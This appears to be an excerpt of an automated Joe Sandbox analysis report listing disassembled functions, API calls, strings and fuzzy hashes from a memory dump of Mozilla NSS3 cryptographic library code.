Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorValuememcpy
String ID: 0
API String ID: 3044119603-4108050209
Opcode ID: 2e4b336f42e1d65420096469896eeb69831ac0f553aa3293c0c2be28d643808a
Instruction ID: 57dcc0915c5e049a72f34df23ce8de1a2bc368212902586081f733e5fb18d1ec
Opcode Fuzzy Hash: 2e4b336f42e1d65420096469896eeb69831ac0f553aa3293c0c2be28d643808a
Instruction Fuzzy Hash: 55F15BB5A002299BDB218F24CD84BDA77B9BF49318F0441E8ED08A7741E775AE94CFD0

Function 6C792C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?yl,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C62
EnterCriticalSection.KERNEL32(0000001C,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C76
PL_HashTableLookup.NSS3(00000000,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C93

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23), ref: 6C792CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?), ref: 6C792CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?), ref: 6C792D4D
EnterCriticalSection.KERNEL32(?), ref: 6C792D61
PL_HashTableLookup.NSS3(?,?), ref: 6C792D71
PR_Unlock.NSS3(?), ref: 6C792D7E

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Strings

#?yl, xrefs: 6C792C43

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?yl
API String ID: 2446853827-101552813
Opcode ID: 8c921c25add2d73404842b6f0b34fa6951c54498e4851ad2a64c54d174c5784b
Instruction ID: cca539bb5a89afce41e8296ae24c582d20a1c198c0117a31fa250013ba0724b2
Opcode Fuzzy Hash: 8c921c25add2d73404842b6f0b34fa6951c54498e4851ad2a64c54d174c5784b
Instruction Fuzzy Hash: A85127B6D00105ABDB10AF24ED498AAB778FF1635CB048534ED1897B12E731ED64C7E1

Function 6C84A4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C84A4E6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C84A4F9
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C84A553
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C84A5AC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C84A5F7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C84A60C
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C84A633
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C84A671
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C84A69A

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C84A61D, 6C84A68B, 6C84A6B3
database corruption, xrefs: 6C84A627
%s at line %d of [%.10s], xrefs: 6C84A62C

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2358773949-598938438
Opcode ID: 9604e1e77c9969287008a18cf0a3e22495ff3229498d9d363bedd8c031845338
Instruction ID: 815d34224a5a8b7d1ddbcf65c4fa4506d4dab52af31a55f08e0707d799a1318f
Opcode Fuzzy Hash: 9604e1e77c9969287008a18cf0a3e22495ff3229498d9d363bedd8c031845338
Instruction Fuzzy Hash: 2C51B5B5908304ABDB21CF69DA80A9A7BE0AF44718F048C3DF8495BB41E731DD84CB92

Function 6C7745B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,6C771984,?), ref: 6C7745F2
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7745FB

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

SECITEM_CompareItem_Util.NSS3(00000000,-00000001), ref: 6C77461E

Part of subcall function 6C7CFCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6C774101,00000000,?,?,?,6C771666,?,?), ref: 6C7CFCF2

SECITEM_CopyItem_Util.NSS3(00000000,?,-00000019), ref: 6C774646
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C774662
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C77467A
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C774691
PL_FreeArenaPool.NSS3 ref: 6C7746A3
PL_FinishArenaPool.NSS3 ref: 6C7746AB
free.MOZGLUE(?), ref: 6C7746BC
PORT_ZAlloc_Util.NSS3(?), ref: 6C7746E5
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C774717

Strings

security, xrefs: 6C7745EC

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$ArenaItem_Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_freememcmpmemcpy
String ID: security
API String ID: 3482804875-3315324353
Opcode ID: f961b977460d854dc7f74933d72976d2bc903d5661f20a9f81f1683a0f0c7d5f
Instruction ID: 2fe3a76117dea4e850e2098060e119d7a535e56735268a996ae7a94dd981a8b8
Opcode Fuzzy Hash: f961b977460d854dc7f74933d72976d2bc903d5661f20a9f81f1683a0f0c7d5f
Instruction Fuzzy Hash: 7F4118B2904314ABDB208B659E44B5B77D8AF4435CF050938EC19E3B41E730E614CBE6

Function 6C7EAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7EADB1

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7EADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C7EAE08

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7EAE25
PL_FreeArenaPool.NSS3 ref: 6C7EAE63
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7EAE4D

Part of subcall function 6C6F4C70: TlsGetValue.KERNEL32(?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4C97
Part of subcall function 6C6F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CB0
Part of subcall function 6C6F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7EAE93
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7EAECC
PL_FreeArenaPool.NSS3 ref: 6C7EAEDE
PL_FinishArenaPool.NSS3 ref: 6C7EAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7EAEF5
PL_FinishArenaPool.NSS3 ref: 6C7EAF16

Strings

security, xrefs: 6C7EADEE

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 71f27c4d46e2fa2ea7606bedf2af6483dacb8d60dcad7583035558c7a82d8037
Instruction ID: 04a78dc9bfe2ad9b2bdf503eef999ed46ea59457b21679fc11bdd8eb8f1b974d
Opcode Fuzzy Hash: 71f27c4d46e2fa2ea7606bedf2af6483dacb8d60dcad7583035558c7a82d8037
Instruction Fuzzy Hash: 834107B390421067E7205B189E4ABAA3BBCAF5A72CF150935E815D6F41F735EA08C7D3

Function 6C7A6650 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 117COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptInit), ref: 6C7A6676
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A66A4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A66B3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A66C9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C7A66E8
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C7A6716
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A6728
PR_LogPrint.NSS3(?,00000000), ref: 6C7A673E

Strings

hKey = 0x%x, xrefs: 6C7A6700, 6C7A6710
pMechanism = 0x%p, xrefs: 6C7A66E3
(CK_INVALID_HANDLE), xrefs: 6C7A66AC, 6C7A671E
hSession = 0x%x, xrefs: 6C7A668E, 6C7A669E
C_DecryptInit, xrefs: 6C7A6671

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptInit
API String ID: 1003633598-277163776
Opcode ID: 75d78485a466174302504e452585f0cca1569d43949eadce474b2b5fe097d0d6
Instruction ID: a89d6c65b8d2b1311fcb8db0a588a7eb5b22f8737feb1edcb3aec82e95bd3494
Opcode Fuzzy Hash: 75d78485a466174302504e452585f0cca1569d43949eadce474b2b5fe097d0d6
Instruction Fuzzy Hash: 4341F431602114ABDB309BA89F8CFAA77B5AB4631CF044435E90997B12DB34BD09CBD1

Function 6C7A6500 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_EncryptFinal), ref: 6C7A6526
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A6554
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A6563

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A6579
PR_LogPrint.NSS3( pLastEncryptedPart = 0x%p,?), ref: 6C7A6595
PR_LogPrint.NSS3( pulLastEncryptedPartLen = 0x%p,?), ref: 6C7A65B0
PR_LogPrint.NSS3( *pulLastEncryptedPartLen = 0x%x,?), ref: 6C7A661A

Strings

*pulLastEncryptedPartLen = 0x%x, xrefs: 6C7A6615
(CK_INVALID_HANDLE), xrefs: 6C7A655C
hSession = 0x%x, xrefs: 6C7A653E, 6C7A654E
pulLastEncryptedPartLen = 0x%p, xrefs: 6C7A65AB
pLastEncryptedPart = 0x%p, xrefs: 6C7A6590
C_EncryptFinal, xrefs: 6C7A6521

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulLastEncryptedPartLen = 0x%x$ hSession = 0x%x$ pLastEncryptedPart = 0x%p$ pulLastEncryptedPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_EncryptFinal
API String ID: 1003633598-2178457252
Opcode ID: 7037f2dc39b0025665c045d44d019a18bc944fac7e672c1c3a84f76c9fb43d64
Instruction ID: 48dfc671a79e428a516b7a190fc5c31803551295454874b08f174d28ea596dc0
Opcode Fuzzy Hash: 7037f2dc39b0025665c045d44d019a18bc944fac7e672c1c3a84f76c9fb43d64
Instruction Fuzzy Hash: 0E31F431602154AFDB208F98DF4CB5A77B5EB4631DF044435E80897B12DB34BA49CBD1

Function 6C788DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C788E22
EnterCriticalSection.KERNEL32(?), ref: 6C788E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C788E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C788E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C788E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C788EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C788EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C788EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C788F00
free.MOZGLUE(?), ref: 6C788F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C788F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C788F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C788F5B
PR_Unlock.NSS3(?), ref: 6C788F72
PR_Unlock.NSS3(?), ref: 6C788F82

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: e4c227acf365f9651af40915d1f4747a03b335c55c84e76027dca5de30e03625
Instruction ID: 53bb757dcaf87ab12245cc339c40754e17b0856ff4376d05723d7dbfeb58a36a
Opcode Fuzzy Hash: e4c227acf365f9651af40915d1f4747a03b335c55c84e76027dca5de30e03625
Instruction Fuzzy Hash: 665127B2E022159FDB209F68CE8496AB7B9EF45358F15453AED089BB00E731ED44C7E1

Function 6C7ACE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C7ACE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C7ACEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C7ACED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C7ACEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C7ACF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C7ACF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C7ACF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C7ACF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C7ACF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C7ACFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C7ACFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C7ACFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C7ACFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C7AD007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C7AD021

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: d71861b3d45e424af87785eeb7c0594796b62e7ef0f97990e010552d3e1d2250
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 16312171B529112BEF0D509B6F2DBDF244A4B6630EF441138FD0AF67C1FAC59A1702AA

Function 6C880FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C881000

Part of subcall function 6C839BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C761A48), ref: 6C839BB3
Part of subcall function 6C839BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C761A48), ref: 6C839BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C881016

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_Unlock.NSS3(?), ref: 6C881021

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C881046
PR_Unlock.NSS3(?), ref: 6C88106B
PR_Lock.NSS3 ref: 6C881079
PR_Unlock.NSS3 ref: 6C881096
free.MOZGLUE(?), ref: 6C8810A7
free.MOZGLUE(?), ref: 6C8810B4
PR_DestroyCondVar.NSS3(?), ref: 6C8810BF
PR_DestroyCondVar.NSS3(?), ref: 6C8810CA
PR_DestroyCondVar.NSS3(?), ref: 6C8810D5
PR_DestroyCondVar.NSS3(?), ref: 6C8810E0
PR_DestroyLock.NSS3(?), ref: 6C8810EB
free.MOZGLUE(?), ref: 6C881105

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: 20e58db071378e3ab96b8d8fa165a6e23142d8334961c51cf5d0891d3c52fef8
Instruction ID: c68648bfbfec31e49407938fce6ced4a348bd8e3600e179bc65660232b309f74
Opcode Fuzzy Hash: 20e58db071378e3ab96b8d8fa165a6e23142d8334961c51cf5d0891d3c52fef8
Instruction Fuzzy Hash: 9631BCB9901402ABD7229F15EE46A45B7B1FF0136DB184535E80903F61EB32F978DBD2

Function 6C7C25F0 Relevance: 21.4, APIs: 8, Strings: 6, Instructions: 403stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7CA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C79A5DF,?,00000000,6C7728AD,00000000,?,6C79A5DF,?,object), ref: 6C7CA0C0
Part of subcall function 6C7CA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C79A5DF,?,00000000,6C7728AD,00000000,?,6C79A5DF,?,object), ref: 6C7CA0E8

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7C2834
memcmp.VCRUNTIME140(00000000,00000020,00000020,?,?,?,?,?,?,?,?), ref: 6C7C284B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7C2A98
memcmp.VCRUNTIME140(00000000,?,00000020,?,?,?,?,?,?,?,?,?,?), ref: 6C7C2AAF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7C2BDC
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7C2BF3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7C2D23
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?), ref: 6C7C2D34

Strings

manufacturer, xrefs: 6C7C285E
serial, xrefs: 6C7C2AC2
, xrefs: 6C7C2A8E, 6C7C2AAB
OQyl, xrefs: 6C7C25F7, 6C7C25FF, 6C7C2863, 6C7C2AC7, 6C7C2C0B
token, xrefs: 6C7C25FA
model, xrefs: 6C7C2C06

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
